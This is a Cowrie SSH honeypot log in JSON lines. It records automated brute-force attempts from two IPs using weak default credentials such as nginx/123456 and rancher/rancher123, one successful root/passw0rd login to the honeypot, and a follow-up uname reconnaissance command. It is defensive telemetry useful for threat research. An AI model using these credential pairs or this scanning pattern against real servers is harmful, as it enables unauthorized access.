{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33404,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1d899750c33","protocol":"ssh","message":"New connection: 212.227.235.229:33404 (1.2.3.4:22) [session: f1d899750c33]","sensor":"my-vps","timestamp":"2025-08-28T06:38:17.870487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:17.872225Z","src_ip":"212.227.235.229","session":"f1d899750c33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:18.124596Z","src_ip":"212.227.235.229","session":"f1d899750c33"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:18.883086Z","src_ip":"212.227.235.229","session":"f1d899750c33"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:20.137079Z","src_ip":"212.227.235.229","session":"f1d899750c33"}
{"eventid":"cowrie.session.closed","duration":30.486692428588867,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:25.472552Z","src_ip":"211.171.47.199","session":"654aa9dc2f5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56096,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a393cb1e1d1","protocol":"ssh","message":"New connection: 212.227.125.160:56096 (1.2.3.4:22) [session: 1a393cb1e1d1]","sensor":"my-vps","timestamp":"2025-08-28T06:38:27.524631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:27.525537Z","src_ip":"212.227.125.160","session":"1a393cb1e1d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:27.744276Z","src_ip":"212.227.125.160","session":"1a393cb1e1d1"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:28.402656Z","src_ip":"212.227.125.160","session":"1a393cb1e1d1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:29.623692Z","src_ip":"212.227.125.160","session":"1a393cb1e1d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55880,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3a96abcfebe","protocol":"ssh","message":"New connection: 212.227.235.229:55880 (1.2.3.4:22) [session: f3a96abcfebe]","sensor":"my-vps","timestamp":"2025-08-28T06:38:33.936042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:33.937224Z","src_ip":"212.227.235.229","session":"f3a96abcfebe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:34.187331Z","src_ip":"212.227.235.229","session":"f3a96abcfebe"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:34.940354Z","src_ip":"212.227.235.229","session":"f3a96abcfebe"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:36.193254Z","src_ip":"212.227.235.229","session":"f3a96abcfebe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40840,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab519ace5b88","protocol":"ssh","message":"New connection: 212.227.125.160:40840 (1.2.3.4:22) [session: ab519ace5b88]","sensor":"my-vps","timestamp":"2025-08-28T06:38:43.750188Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:43.751707Z","src_ip":"212.227.125.160","session":"ab519ace5b88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:43.978981Z","src_ip":"212.227.125.160","session":"ab519ace5b88"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:44.676977Z","src_ip":"212.227.125.160","session":"ab519ace5b88"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:45.907987Z","src_ip":"212.227.125.160","session":"ab519ace5b88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35260,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c1947785d7","protocol":"ssh","message":"New connection: 212.227.235.229:35260 (1.2.3.4:22) [session: 09c1947785d7]","sensor":"my-vps","timestamp":"2025-08-28T06:38:50.302420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:50.303531Z","src_ip":"212.227.235.229","session":"09c1947785d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:38:50.558570Z","src_ip":"212.227.235.229","session":"09c1947785d7"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:38:51.383562Z","src_ip":"212.227.235.229","session":"09c1947785d7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:38:52.639249Z","src_ip":"212.227.235.229","session":"09c1947785d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39246,"dst_ip":"1.2.3.4","dst_port":22,"session":"e84a2832a3e8","protocol":"ssh","message":"New connection: 212.227.125.160:39246 (1.2.3.4:22) [session: e84a2832a3e8]","sensor":"my-vps","timestamp":"2025-08-28T06:38:59.854290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:38:59.907944Z","src_ip":"212.227.125.160","session":"e84a2832a3e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:00.074294Z","src_ip":"212.227.125.160","session":"e84a2832a3e8"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:00.952719Z","src_ip":"212.227.125.160","session":"e84a2832a3e8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:02.175051Z","src_ip":"212.227.125.160","session":"e84a2832a3e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57314,"dst_ip":"1.2.3.4","dst_port":22,"session":"830b0e942778","protocol":"ssh","message":"New connection: 212.227.235.229:57314 (1.2.3.4:22) [session: 830b0e942778]","sensor":"my-vps","timestamp":"2025-08-28T06:39:06.358366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:06.359638Z","src_ip":"212.227.235.229","session":"830b0e942778"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:06.622079Z","src_ip":"212.227.235.229","session":"830b0e942778"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:39:07.455313Z","src_ip":"212.227.235.229","session":"830b0e942778"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:08.720244Z","src_ip":"212.227.235.229","session":"830b0e942778"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32808,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d7baedb8e82","protocol":"ssh","message":"New connection: 212.227.125.160:32808 (1.2.3.4:22) [session: 2d7baedb8e82]","sensor":"my-vps","timestamp":"2025-08-28T06:39:16.368743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:16.382525Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:16.588427Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:39:18.636716Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:39:19.160417Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.161099Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.381310Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.382942Z","src_ip":"212.227.125.160","session":"2d7baedb8e82"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.410023Z","src_ip":"212.227.125.160","session":"8122780e7b0e"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.411211Z","src_ip":"212.227.125.160","session":"b78c0412cad2"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.411915Z","src_ip":"212.227.125.160","session":"2b6f2607bcbd"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:19.412634Z","src_ip":"212.227.125.160","session":"6db831c1b20a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42450,"dst_ip":"1.2.3.4","dst_port":22,"session":"400950ce8735","protocol":"ssh","message":"New connection: 212.227.235.229:42450 (1.2.3.4:22) [session: 400950ce8735]","sensor":"my-vps","timestamp":"2025-08-28T06:39:23.153085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:39:23.153919Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:39:23.411460Z","src_ip":"212.227.235.229","session":"400950ce8735"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.158573Z","src_ip":"212.227.125.160","session":"542fc71961f6"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.159572Z","src_ip":"212.227.125.160","session":"c289f92ecb06"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.160653Z","src_ip":"212.227.125.160","session":"c8f9fb433cbf"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.162183Z","src_ip":"212.227.125.160","session":"f335c25db582"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.163888Z","src_ip":"212.227.125.160","session":"c54df3a0f614"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:39:24.165567Z","src_ip":"212.227.125.160","session":"4532aeebaa9f"}
